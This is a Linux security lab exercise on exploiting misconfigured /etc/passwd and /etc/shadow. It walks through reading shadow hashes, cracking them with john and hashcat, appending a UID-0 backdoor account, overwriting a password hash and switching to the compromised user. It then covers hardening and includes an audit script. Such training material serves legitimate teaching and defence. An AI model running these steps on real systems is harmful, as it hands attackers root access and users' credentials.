Exercise 15: Exploiting Misconfigured /etc/passwd or /etc/shadow

Mar 17, 2025

Objective: Learn how to exploit misconfigurations in the /etc/passwd and /etc/shadow files to gain unauthorized access and understand best practices for securing these files.


Scenario: The /etc/passwd and /etc/shadow files store essential information about user accounts and their authentication data. Misconfigurations, such as empty passwords or improper permissions, can allow attackers to gain unauthorized access or escalate privileges. Your task is to identify such vulnerabilities, exploit them, and secure these files to prevent abuse.


Lab Setup

  1. Environment:
    • A Linux system with potentially misconfigured /etc/passwd or /etc/shadow files.
  2. Tools Required:
    • john or hashcat for password cracking.
    • Text editor (e.g., vim, nano) with root privileges.

Lab Steps

Step 1: Inspect Permissions and Content of /etc/passwd and /etc/shadow

Check the permissions of the files:

ls -l /etc/passwd /etc/shadow

Correct permissions:

-rw-r--r-- 1 root root /etc/passwd 
-r-------- 1 root shadow /etc/shadow

If either file is writable by non-root users, or /etc/shadow is readable by them, the files are vulnerable.

Inspect /etc/passwd for misconfigured entries:

cat /etc/passwd

Look for accounts whose password field (the second field) is empty, so that the username is followed directly by :: as in:

testuser::1001:1001::/home/testuser:/bin/bash

Inspect /etc/shadow for weak or empty password hashes:

sudo cat /etc/shadow

Example weak entry:

testuser:$6$randomsalt$hashedpassword:18446:0:99999:7:::

Step 2: Crack Passwords Using john or hashcat

Extract password hashes from /etc/shadow:

sudo cat /etc/shadow | grep testuser > hashes.txt

Use john to crack the password:

john --wordlist=/path/to/wordlist.txt hashes.txt

Monitor the output for cracked passwords.

Alternatively, use hashcat:

hashcat -m 1800 -a 0 hashes.txt /path/to/wordlist.txt

Replace -m 1800 with the appropriate mode for the hash type.

Step 3: Modify /etc/passwd or /etc/shadow

Add a New Root User to /etc/passwd:

Append the following entry to /etc/passwd:

rootuser:x:0:0:root:/root:/bin/bash

This creates a new user (rootuser) with UID and GID 0, that is, with root privileges.

Change the Password for an Existing User:

Generate a new password hash:

openssl passwd -6 newpassword

Replace the hash in /etc/shadow for the user:

testuser:$6$newhashedpassword:18446:0:99999:7:::

Step 4: Gain Unauthorized Access

Switch to the compromised user account:

su testuser

Verify access and privileges:

whoami


Solution

Explanation:

  • The /etc/passwd file stores user account information, while /etc/shadow stores the password hashes. Improper permissions or configurations can allow attackers to read or modify these files, leading to privilege escalation.

Prevention:

Enforce Secure Permissions:

Set proper permissions on /etc/passwd and /etc/shadow:

chmod 644 /etc/passwd 
chmod 400 /etc/shadow

Audit User Accounts:

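Regularly check for empty password fields or unnecessary accounts. Match on the password field itself (the second field); a plain grep for '::' also matches accounts whose comment field is empty:

awk -F: '$2 == "" {print $1}' /etc/passwd
sudo awk -F: '$2 == "" {print $1}' /etc/shadow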
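
The inspection from Step 1 and the account audit above, collected into one read-only script. This is an added example, not part of the original exercise: the function names are its own, the allowed modes 644 and 400 are the ones this page gives, GNU stat is assumed, and the sample files are constructed.

```shell
#!/bin/sh
# Added example (not the lab's own code): read-only audit of passwd/shadow-format files.
# Function names are this example's own; assumes GNU stat, as on Linux.

# Accounts whose password field (field 2) is empty; an empty GECOS field is not reported.
empty_password_accounts() {
    awk -F: 'NF >= 2 && $2 == "" { print $1 }' "$1"
}

# Accounts other than root that carry UID 0 (passwd layout, field 3).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Permission bits (octal) set on file $1 beyond allowed mode $2; prints nothing if none.
excess_mode_bits() {
    mode=$(stat -c '%a' "$1") || return 1
    excess=$(( 0$mode & ~0$2 & 07777 ))
    [ "$excess" -eq 0 ] || printf '%o\n' "$excess"
}

# Run every check; $1 = passwd file, $2 = shadow file. Returns 1 on any finding.
audit_account_files() {
    findings=$(
        for u in $(empty_password_accounts "$1"); do echo "passwd: empty password field: $u"; done
        for u in $(empty_password_accounts "$2"); do echo "shadow: empty password field: $u"; done
        for u in $(extra_uid0_accounts "$1"); do echo "passwd: non-root account with UID 0: $u"; done
        bits=$(excess_mode_bits "$1" 644); [ -z "$bits" ] || echo "passwd: excess mode bits $bits"
        bits=$(excess_mode_bits "$2" 400); [ -z "$bits" ] || echo "shadow: excess mode bits $bits"
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"; return 1
}

# Constructed sample files, used when no paths are given on the command line.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'testuser::1001:1001::/home/testuser:/bin/bash' \
        'rootuser:x:0:0:root:/root:/bin/bash' > "$d/passwd"
    printf '%s\n' 'root:!:18446:0:99999:7:::' 'testuser::18446:0:99999:7:::' > "$d/shadow"
    chmod 666 "$d/passwd"; chmod 644 "$d/shadow"
    audit_account_files "$d/passwd" "$d/shadow" && rc=0 || rc=$?
    rm -rf "$d"; return $rc
}

if [ $# -ge 2 ]; then audit_account_files "$1" "$2"; else demo || :; fi
```

To audit the live files, run it as root with /etc/passwd and /etc/shadow as the two arguments; the exit status is 1 when anything is reported.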

Implement Strong Password Policies:

Use tools like pam_pwquality to enforce password complexity.

Configure /etc/security/pwquality.conf with rules for minimum length, character classes, and reuse prevention.

Monitor and Log Changes:

Use tools like auditd to log access and modifications to /etc/passwd and /etc/shadow.


Testing and Verification

  1. Re-check permissions and configurations of /etc/passwd and /etc/shadow.
  2. Attempt to read or modify the files without root privileges to confirm they are secured.
  3. Test user accounts to ensure passwords meet complexity requirements and are functional.

Reflection

This exercise demonstrates the critical importance of securing /etc/passwd and /etc/shadow files. By identifying and exploiting misconfigurations, you’ve gained insights into protecting these essential files to prevent unauthorized access and privilege escalation.
